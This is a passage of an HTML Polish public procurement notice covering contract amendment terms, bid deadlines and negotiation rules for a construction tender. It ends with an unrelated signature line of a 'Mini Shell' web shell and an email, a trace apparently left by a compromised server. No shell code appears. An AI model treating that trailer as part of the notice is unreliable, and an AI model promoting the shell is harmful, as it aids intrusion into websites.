agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego składa każdy z Wykonawców wspólnie ubiegających się o zamówienie (treść oświadczenia zawiera załącznik nr 2 do SWZ).<br/>8) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/usługi wykonają poszczególni wykonawcy (- wypełniony formularz stanowiący załącznik nr 3 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Istotna zmiana postanowień umowy jest dopuszczalna:<br/>1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy; w<br/>takiej sytuacji zmianie mogą ulec te zapisy Umowy, dla których zmiana przepisów będzie relewantna;<br/>2) w przypadku opisanym w § 4 ust. 3-5 Umowy oraz w przypadku uniemożliwienia rozpoczęcia realizacji Umowy lub<br/>zaistnienia przerw w jej wykonaniu leżących po stronie Zamawiającego (np. przyczyny organizacyjne, nieprzekazanie<br/>terenu, niezapewnienie możliwości poboru wody i energii elektrycznej na potrzeby wykonywanych prac, wstrzymania lub<br/>ograniczenia środków finansowych Zamawiającego) lub wynikających z konieczności wykonania robót dodatkowych, o<br/>których mowa w art. 455 ust. 1 pkt 3) ustawy Pzp, termin wykonania przedmiotu zamówienia ulega przesunięciu o okres<br/>wynikający z przerw lub opóźnienia rozpoczęcia prac.<br/>3) w przypadku pojawienia się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie<br/>kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego przedmiotu Umowy, lub umożliwiające<br/>uzyskanie lepszej jakości wykonywanych robót – poprzez zastosowanie tych materiałów lub urządzeń ze skutkiem<br/>zmniejszenia kosztów lub uzyskania lepszej jakości robót, z zastrzeżeniem, że zmiany te nie mogą prowadzić do<br/>podwyższenia wynagrodzenia Wykonawcy ani wydłużenia terminu realizacji przedmiotu zamówienia. Zmiana możedotyczyć jedynie używanych przez Wykonawcę materiałów.<br/>4) w przypadku pojawienia się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie<br/>czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu<br/>umowy – poprzez zastosowanie tej technologii ze skutkiem skrócenia czasu realizacji lub zmniejszenia kosztów, z<br/>zastrzeżeniem, że zmiany te nie mogą prowadzić do podwyższenia wynagrodzenia Wykonawcy.<br/>5) w przypadku zmiany osoby wskazanej jako Kierownik budowy/Kierownik Robót.<br/>6) przypadku zaniechania wykonania robót, których wykonanie w trakcie realizacji stało się zbędne – a nie można było<br/>przewidzieć tego w dniu zawarcia Umowy.<br/>7) nastąpi zmiana powszechnie obowiązujących przepisów prawa, w takim przypadku zmianie mogą ulec te zapisy Umowy,<br/>na które zmiana przepisów miała wpływ.<br/>3. Wniosek Wykonawcy o zmianę treści Umowy winien być zgłoszony Zamawiającemu, w terminie do 7 dni od momentu<br/>wystąpienia przesłanek do zmian Umowy. Wniosek powinien zawierać szczegółowe uzasadnienie wraz z<br/>ewentualnymidokumentami potwierdzającymi okoliczności faktyczne wskazywane przez Wykonawcę we wniosku.<br/>Zamawiający może<br/>zażądać od Wykonawcy okazania oryginałów przedstawionych przez Wykonawcę dokumentów.<br/>4. Zmiany danych teleadresowych, numeru konta bankowego spowodowane przyczynami organizacyjnymi, nastąpią<br/>poprzez przekazanie pisemnego oświadczenia Strony, której zmiany dotyczą, drugiej Stronie <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-09 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami, należy złożyć zapośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-09 15:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> W celu ograniczenia liczby wykonawców zamawiający będzie stosował kryteria identyczne z kryteriami oceny ofert.

Creat By MiNi SheLL
Email: jattceo@gmail.com